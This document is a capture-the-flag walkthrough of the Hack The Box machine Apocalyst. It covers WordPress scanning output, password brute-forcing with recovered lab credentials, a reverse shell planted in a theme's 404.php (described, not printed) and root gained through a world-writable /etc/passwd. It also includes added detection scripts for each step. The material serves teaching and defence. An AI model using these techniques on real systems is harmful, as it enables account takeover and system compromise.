10.10.10.46 - Apocalyst
Run Nmap with -sV for service detection, -O for OS detection and -A for an aggressive scan against 10.10.10.46:
We discover the directory structure and the versions in use: Apache 2.4.18 running on Ubuntu Xenial and WordPress 4.8.
A virtual host is present, as reported by the NoScript extension. Add apocalyst.htb to /etc/hosts:
The wp-admin login page:
Output of wpscan:
└──╼ $wpscan --url apocalyst.htb --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|     |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.5.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://apocalyst.htb/
[+] Started: Tue May 21 00:27:25 2019

Interesting Finding(s):

[+] http://apocalyst.htb/
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://apocalyst.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://apocalyst.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://apocalyst.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://apocalyst.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://apocalyst.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.8</generator>
 |  - http://apocalyst.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.8</generator>
 |
 | [!] 27 vulnerabilities identified:
 |
 | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8905
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |
 | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41398
 |
 | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41457
 |
 | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41397
 |
 | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41448
 |
 | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |     Fixed in: 4.8.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8914
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41395
 |      - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |
 | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8807
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
 |      - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |      - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |      - https://core.trac.wordpress.org/ticket/25239
 |
 | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |     Fixed in: 4.8.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8941
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
 |      - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |      - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |      - https://twitter.com/ircmaxell/status/923662170092638208
 |      - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |
 | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8966
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |
 | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8967
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |
 | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8968
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |
 | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8969
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |
 | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9006
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
 |      - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
 |      - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/42720
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
 |
 | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9053
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
 |
 | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9054
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
 |
 | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9055
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.8.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

[+] WordPress theme in use: twentyseventeen
 | Location: http://apocalyst.htb/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://apocalyst.htb/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://apocalyst.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://apocalyst.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <=================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] falaraki
 | Detected By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Finished: Tue May 21 00:27:32 2019
[+] Requests Done: 25
[+] Cached Requests: 38
[+] Data Sent: 4.864 KB
[+] Data Received: 244.238 KB
[+] Memory used: 93.688 MB
[+] Elapsed time: 00:00:06
User falaraki is identified as the author of the posts.
Directory enumeration returns 301 Moved Permanently for each and every page:
However, if we first generate a word list with CeWL and run it against apocalyst.htb, we see that one of the files has a different size:
Most of the time in CTF scenarios, files are hidden within images. To extract any hidden data we can use steghide:
Password: blank (press ENTER)
With the discovered username and the probable password list list.txt we can start brute-forcing our way in:
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - falaraki / Transclisiation
Trying falaraki / total Time: 00:00:19 <===================================================================================================================================================================> (335 / 335) 100.00% Time: 00:00:19

[i] Valid Combinations Found:
 | Username: falaraki, Password: Transclisiation

[+] Finished: Tue May 21 00:29:31 2019
[+] Requests Done: 358
[+] Cached Requests: 34
[+] Data Sent: 98.017 KB
[+] Data Received: 1.226 MB
[+] Memory used: 170.918 MB
[+] Elapsed time: 00:00:26
In this case the password Transclisiation has been discovered, which allows us to log in:
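From the defender's side, the wpscan password attack above leaves an unmistakable trace in the web server's access log: a burst of POST requests to wp-login.php from one client, each answered with 200 (WordPress re-renders the login form on failure) until a 302 redirect marks the successful guess. The following detector is an added example, not part of the original write-up; the Apache combined-format log lines, IP addresses and User-Agent string are constructed sample data, and the threshold and window are assumptions to tune per site.

```python
"""Flag wp-login.php password-guessing bursts in Apache combined-format logs.

Added example (not from the original write-up). Log lines, client IPs and
the User-Agent string are constructed; the 5-requests-per-60-seconds
threshold is an assumed default.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: six rapid POSTs from one client (five failures answered
# with 200, then a 302 on success) and one ordinary login from another client.
SAMPLE_LOG = """\
10.10.14.5 - - [21/May/2019:00:29:10 +0000] "POST /wp-login.php HTTP/1.1" 200 4391 "-" "ConstructedScanner/1.0"
10.10.14.5 - - [21/May/2019:00:29:10 +0000] "POST /wp-login.php HTTP/1.1" 200 4391 "-" "ConstructedScanner/1.0"
10.10.14.5 - - [21/May/2019:00:29:11 +0000] "POST /wp-login.php HTTP/1.1" 200 4391 "-" "ConstructedScanner/1.0"
10.10.14.5 - - [21/May/2019:00:29:12 +0000] "POST /wp-login.php HTTP/1.1" 200 4391 "-" "ConstructedScanner/1.0"
10.10.14.5 - - [21/May/2019:00:29:13 +0000] "POST /wp-login.php HTTP/1.1" 200 4391 "-" "ConstructedScanner/1.0"
10.10.14.5 - - [21/May/2019:00:29:14 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "ConstructedScanner/1.0"
192.168.1.20 - - [21/May/2019:00:31:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://apocalyst.htb/wp-login.php" "Mozilla/5.0"
192.168.1.20 - - [21/May/2019:00:31:03 +0000] "GET /wp-admin/ HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
"""

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_login_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"attempts": n, "succeeded": bool}} for every client that sent
    at least `threshold` POSTs to wp-login.php inside any `window`-long span.
    `succeeded` is True when a 302 (successful login redirect) follows the burst.
    """
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            posts[rec["ip"]].append((rec["ts"], rec["status"]))

    alerts = {}
    for ip, events in posts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                succeeded = any(status == 302 for _, status in events[end:])
                alerts[ip] = {"attempts": len(events), "succeeded": succeeded}
                break
    return alerts


if __name__ == "__main__":
    for ip, info in find_login_bursts(SAMPLE_LOG).items():
        print("[!] %s: %d wp-login.php POSTs, login succeeded: %s" % (ip, info["attempts"], info["succeeded"]))
```

Run it against a real log by passing the file contents to find_login_bursts(); the single legitimate login from 192.168.1.20 stays below the threshold and is not reported. Rate limiting or a lockout plugin on wp-login.php, and disabling xmlrpc.php (which wpscan also flagged and which offers an alternative login path), are the usual mitigations.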
Let's modify 404.php to include reverse shell instructions back to the attacker's machine and trigger the shell by visiting:
apocalyst.htb/wp-content/themes/twentyseventeen/404.php
Successful reverse shell:
Mystery of apocalyst unfolds:
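The theme-editor step above works because WordPress lets an administrator rewrite theme PHP in place, so a modified 404.php is indistinguishable from the original unless something remembers what the original looked like. A hash baseline of the theme directory catches exactly this. The script below is an added example, not code from the original write-up: the theme files are constructed in a temporary directory so it runs offline, and in practice the baseline would be taken from a clean copy of the same theme version (Twenty Seventeen 1.3, as reported by wpscan). Setting DISALLOW_FILE_EDIT in wp-config.php removes the editor altogether.

```python
"""Detect tampered WordPress theme files by comparing against a hash baseline.

Added example, not from the original write-up. The theme directory and its
contents are constructed in a temporary directory; point hash_tree() at a
real wp-content/themes/<theme>/ directory to use it live.
"""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Return {relative_path: sha256_hex} for every regular file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare_to_baseline(current, baseline):
    """Classify files as modified (hash differs), added (absent from the
    baseline) or missing (in the baseline but no longer on disk)."""
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario: take a baseline of a clean theme, then alter
    404.php and drop an unexpected file, as an attacker with editor access might."""
    with tempfile.TemporaryDirectory() as theme:
        os.makedirs(os.path.join(theme, "template-parts"))
        clean_files = {
            "style.css": "/*\nTheme Name: Twenty Seventeen\nVersion: 1.3\n*/\n",
            "404.php": "<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n",
            "template-parts/header.php": "<?php // constructed header part ?>\n",
        }
        for rel, body in clean_files.items():
            with open(os.path.join(theme, rel), "w") as fh:
                fh.write(body)
        baseline = hash_tree(theme)  # recorded while the theme is known-good

        # Simulate tampering: 404.php rewritten, an extra PHP file appears.
        with open(os.path.join(theme, "404.php"), "w") as fh:
            fh.write("<?php /* contents replaced */ ?>\n")
        with open(os.path.join(theme, "wp-cache.php"), "w") as fh:
            fh.write("<?php /* unexpected file */ ?>\n")

        return compare_to_baseline(hash_tree(theme), baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print("[!] %s: %s" % (kind, p))
```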
When we run the LinEnum.sh privilege escalation check we find that the permissions on /etc/passwd are lax: the file can be modified by everyone:
Since we have read and write access to the /etc/passwd file we can create our own privileged user. OpenSSL comes in handy for creating a new password hash in the accepted format:
Once we have the salted password hash, all we need to do to get root access is to add a new user to the /etc/passwd file:
User offsec added.
And log in with su offsec, password offsec, to gain root privileges on the machine:
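The root path above depends on three conditions that are each easy to audit: /etc/passwd writable by non-root users, a second account with UID 0, and a password hash stored inline in /etc/passwd instead of the "x" that defers to /etc/shadow (which is what makes the openssl-generated hash work for su). The audit script below is an added example, not part of the original write-up; the sample file content and mode are constructed, with the offsec entry's hash replaced by a placeholder, and audit_passwd() reads a real file when given a path.

```python
"""Audit /etc/passwd for the weaknesses this privilege escalation relies on.

Added example, not from the original write-up. SAMPLE_PASSWD and the mode
passed to audit_passwd_text() are constructed; the hash in the offsec line is
a placeholder, not a real openssl output.
"""
import os
import stat

# Constructed sample mirroring the post-exploitation state described above:
# a UID-0 'offsec' user with an inline hash appended to the file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
falaraki:x:1000:1000:falaraki,,,:/home/falaraki:/bin/bash
offsec:$1$CONSTRUCTED$placeholderhash:0:0:offsec:/root:/bin/bash
"""

# Password-field values that mean "no hash stored here": deferred to shadow or locked.
SHADOWED_OR_LOCKED = ("x", "*", "!", "!!")


def audit_passwd_text(text, mode):
    """Return a list of findings for passwd content `text` whose file mode bits are `mode`."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("passwd is writable by group or others (mode %o)" % (mode & 0o777))
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("line %d: malformed entry (%d fields)" % (lineno, len(fields)))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append("line %d: extra UID 0 account '%s'" % (lineno, name))
        if pw == "":
            findings.append("line %d: empty password field for '%s' (no password required)" % (lineno, name))
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append("line %d: inline password hash for '%s'" % (lineno, name))
    return findings


def audit_passwd(path="/etc/passwd"):
    """Live variant: read the file and its mode from disk and audit them."""
    with open(path) as fh:
        text = fh.read()
    return audit_passwd_text(text, os.stat(path).st_mode)


if __name__ == "__main__":
    # 0o100666 is the constructed mode of a world-writable regular file.
    for finding in audit_passwd_text(SAMPLE_PASSWD, 0o100666):
        print("[!]", finding)
```

On a healthy system the file is mode 644 owned by root, root is the only UID-0 entry, and every password field is "x"; any of the three findings above is worth an alert, and the world-writable one is the root cause that LinEnum.sh surfaced here.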